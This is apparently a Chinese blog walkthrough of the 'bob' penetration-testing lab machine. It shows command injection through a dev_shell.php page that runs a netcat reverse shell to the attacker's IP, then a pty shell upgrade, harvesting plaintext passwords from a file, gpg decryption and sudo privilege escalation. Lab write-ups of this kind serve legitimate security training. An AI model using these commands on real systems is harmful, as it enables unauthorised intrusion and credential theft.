渗透测试靶机:bob benben Posted on Mar 28 2024 Web 首先,扫描一下。  目录扫描下,发现有个robots.txt,然后发现还有个dev_shell.php页面  ``` nc -lnvp 1234//kali开启监听 ``` ``` 网页执行该命令 ip a&nc -e /bin/sh 192.168.2.138 1234 ``` ``` python -c 'import pty; pty.spawn("/bin/bash")' cd /home/bob cat .old_passwordfile.html <html> <p> jc:Qwerty seb:T1tanium_Pa$$word_Hack3rs_Fear_M3 </p> </html> su - jc Qwerty//成功登陆 ```  ``` cd /home/bob/Documents ls -al file login.txt.gpg ```  发现这边有个gpg加密文件 ``` gpg --output login.txt --decrypt /home/bob/Documents/login.txt.gpg ``` 继续搜查,发现一个脚本文件,内容是输出一些语句,每行的首字母都是大写,将每一行的大写字母都提取出来 HARPOCRATES,这会不会就是刚刚加密文件的密码?   ``` bob:b0bcat_ //解密得到的用户名和密码 ``` 然后ssh登陆上,发现他有sudo的权限,直接获得flag  赠人玫瑰,手留余香 赏 Wechat Pay Alipay 渗透测试靶机:zico2 渗透测试靶机:gigachad
